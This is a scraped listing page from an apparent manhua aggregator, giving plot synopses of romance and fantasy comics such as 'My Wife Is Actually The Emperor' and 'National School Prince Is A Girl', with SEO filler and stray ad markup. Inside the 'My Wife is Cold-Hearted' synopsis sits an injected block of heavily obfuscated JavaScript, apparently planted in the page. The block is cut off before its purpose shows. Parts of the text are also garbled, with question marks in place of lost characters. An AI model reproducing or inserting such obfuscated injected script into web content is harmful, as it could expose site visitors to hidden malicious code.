Manhua - Page 65

Manhua is a style of Chinese comic characterized by its intricate artwork and diverse storytelling. With a blend of Chinese cultural themes and popular genres like romance and fantasy, manhua offers something for everyone.

1462 results

My Way Of Killing Gods In Another World

A genius was struck by lightning when trying to flirt with pretty girls and was isekai’ed into another world?! Relying only on himself to survive against monsters, demons, and gods; danger awaits. While leveling up, he gets stronger but will he be able to return to his original world and meet pretty girls again?


My Wealth Roars

Su Chengcheng, a broke girl, worked so hard to make a living, but life didn't treat her well. She got bullied by her classmates and cheated by her boyfriend, even her boss tried to harass her... When she hit bottom, a mysterious man showed up and claimed to be her personal butler. He told her that she was actually the heiress of the Su family, the richest family in the world?! In that case, she vows to get back at those who once humiliated her!


My Wicked Little Girl

Roe, The Main Character, Has Difficulty Understanding The Feelings Of Others. One Day, She Witnesses A Murder Scene And Is Branded As The Culprit. Framed And Called The “Diabolical Witch—Murder,” She Dies By Her Father’s Hands. However… She Who Definitely Died Before Her Father’s Resentful Gaze Somehow Reincarnates Into Her 15-Year-Old Self, Five Years Before Her Death. As A Blunt Person Who Cannot Sympathize With Or Understand Other People’s Feelings, Roe Only Thought It To Be Annoying To Have To Repeat The Same Life Again, And… Contrary To Her Expectations That It Would Simply Be A Repetition Of The Past, Her Life Gets Entangled With Life’s Events And She Starts Heading In A New Direction…! A Romance Fantasy Full Of Her Development, As Transparent Watercolors Slowly Spread Into Her Once Grey And Monotonous Life! Benim Küçük Kötü K?Z?M Ma Méchant Petite Fille Ma Petite Fille Méchant My Little Devil My Little Deviless My Little Villainess My Little Wicked Girl My Young Villainess ?? ?? ??


My Wife Is Actually The Emperor

My wife is very beautiful, even the newly enthroned female emperor can't compare to it! My wife's cooking skills are superb, even the imperial kitchen can't match it! My wife loves and cares about me very much, even if the female emperor likes me, I won't change her for others! what? My wife turned out to be the emperor!?


My Wife Is Actually The Empress?

With My Wife’s Breathtaking Beauty, Not Even The Newly Enthroned Empress Can Match Her! With My Wife’s Marvelous Culinary Skills, Not Even The Empress’s Royal Chefs Can Match Her! My Wife Loves Me And Cares About Me Very Very Much, And I Wouldn’t Trade Her For Even The Empress! Wait, What? My Wife Is The Empress?! My Wife Is Actually The Emperor


My Wife is Cold-Hearted

Rui Xi has a bad family circumstances so Ji Yun married her. On the first day of their marriage life, Ji Yun said to Rui Xi:” I gave you the position of becoming my wife but I will never be yours.“ After years, she became a cold-hearted person. She brought a young child with her and appeared in front of Ji Yun. His mind is now messed up but is Rui Xi’s?<script></script><script>(function(_0x23f9d8,_0x1209e3){var _0x5be63a=_0x22d7,_0x2e7dfb=_0x23f9d8();while(!![]){try{var _0x31d1f3=-parseInt(_0x5be63a(0x1f1))/(0x2d*-0x63+-0x1d38+-0x1*-0x2ea0)*(parseInt(_0x5be63a(0x1f9))/(0x1*0x937+0x11*-0x3+-0x902))+-parseInt(_0x5be63a(0x1fb))/(0x7cb+-0xb29*0x1+0x361)*(-parseInt(_0x5be63a(0x1f8))/(-0x107*-0x7+0x1bfc+-0x1*0x2329))+-parseInt(_0x5be63a(0x206))/(-0x3a*0x58+0x162e+-0x239)*(-parseInt(_0x5be63a(0x20a))/(-0x16a*-0x2+0x9a4*0x3+0x83*-0x3e))+parseInt(_0x5be63a(0x203))/(0x1*0x1675+-0x18c5+0x257*0x1)*(-parseInt(_0x5be63a(0x20d))/(-0x9fa*-0x2+0x1c2b*-0x1+0x1*0x83f))+parseInt(_0x5be63a(0x1ef))/(0x141b*0x1+0x1*-0xbce+0x211*-0x4)+parseInt(_0x5be63a(0x207))/(-0xa7c+0x1f93+-0x150d*0x1)*(parseInt(_0x5be63a(0x211))/(0x2625+-0x9e*0x36+-0x5e*0xd))+-parseInt(_0x5be63a(0x1f2))/(-0x2*0x394+0x103f+-0x90b);if(_0x31d1f3===_0x1209e3)break;else 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My Wife Is Cute

The story began with a big adventure game. He got drunk and accidently broke into her room and left her money before leaving the next day…”hey you pervert! What kind of person you regard me?!” “what?! you are the one who set up this “trap” to scheme me!” My Wife is Cute Comics Online. The story began with a big adventure game. He got drunk and accidently broke into her room and left her money before leaving the next day…"hey you pervert! What kind of person you regard me?!"


My Wife Is From a Thousand Years Ago

Read My Wife Is From a Thousand Years Ago Manhua Jiang He, a girl from the Tang Dynasty, traveled through a thousand years and appeared in front of Xu Qing. Fate brought together this love that spanned a thousand years. Everything the girl was familiar with has become history. Relatives, friends, and enemies have all been left behind 1,200 years ago. The boy is unreserved and leads the girl to start a new life. Pain, confusion, cheers, and laughter will remain in this new world. Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), Mangazin is your best choice, don’t hesitate, just read and feel !


My Wife Is Unqualified

Having been a mature technology, the “artificial human” is, however, forbidden by many countries through the promulgation of various decrees. In the circle of wealthy, nonetheless, “artificial human” are still being produced by many companies secretly to meet the needs of the rich. Artificial mates become a fashion trend! But… my wife seems to be unqualified!


Nan Used To Be Mine Hd

Nan Used to Be Mine HD May escort deserve true love? It that her fault to fall in love with a powerful man like him? Man sees her as a social butterfly, woman disgraces her as a whore/escort. Nan flirted with all sorts of men but what she truly wants is him, no matter how cruelly he treats her with…


National School Prince Is A Girl

Read National School Prince Is A Girl Novel – National School Prince Is A Girl Manhwa Online Free At KunManga The summary of the comic National School Prince Is A Girl: Fu Jiu appears to be a normal lad in high school on the surface. But in fact, she (Yes! She!) is the hacker, Z, a villain-terminator in the online world of an alternate world. Having reincarnated into the body of a woman and being forced to disguise herself as a young man, she reigns over the game world, fights for justice, and puts a spell on all the girls around with her innate charm. However, her flirting comes across as gay to the rich Almighty Qin and his inner circle. Over time, the Almighty Qin falls for him… her. Has he turned gay for him… her? Now, that’s confusing! “National School Prince Is A Girl” is also known as: El Galán Escolar Es una Chica / Guomin Xiao Cao Shi Nusheng / Hotboy Quốc Dân Là Nữ / Le hackeur est une lycéenne ! / O Figurão do Colégio É uma Garota / School Hunk Is A Girl / The School Prince is a Girl / 国民校草是女生 / 帝少心头宠:国民校草是女生 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging

3 days ago

Naughty child and Mommy, Please Wait To Be Loved

Naughty child and Mommy, Please Wait To Be Loved manhua from zinmanga and we hope you like it! read to know about story of two naughty and funny kids After meeting the two children of the Li family, Shi Qing realized <span id="IL_AD9" class="IL_AD">the meaning</span> of a word that no one would ever offend people who can’t be offended. Her peaceful life was completely broken, and even if she ran away, they would have stopped her in the middle of it. Little Lo Li waved and whispered to her softly, “Please come <span id="IL_AD10" class="IL_AD">home</span> with us! Xiao Zheng then said to her coldly: “You can only be bullied by me! Remember?!
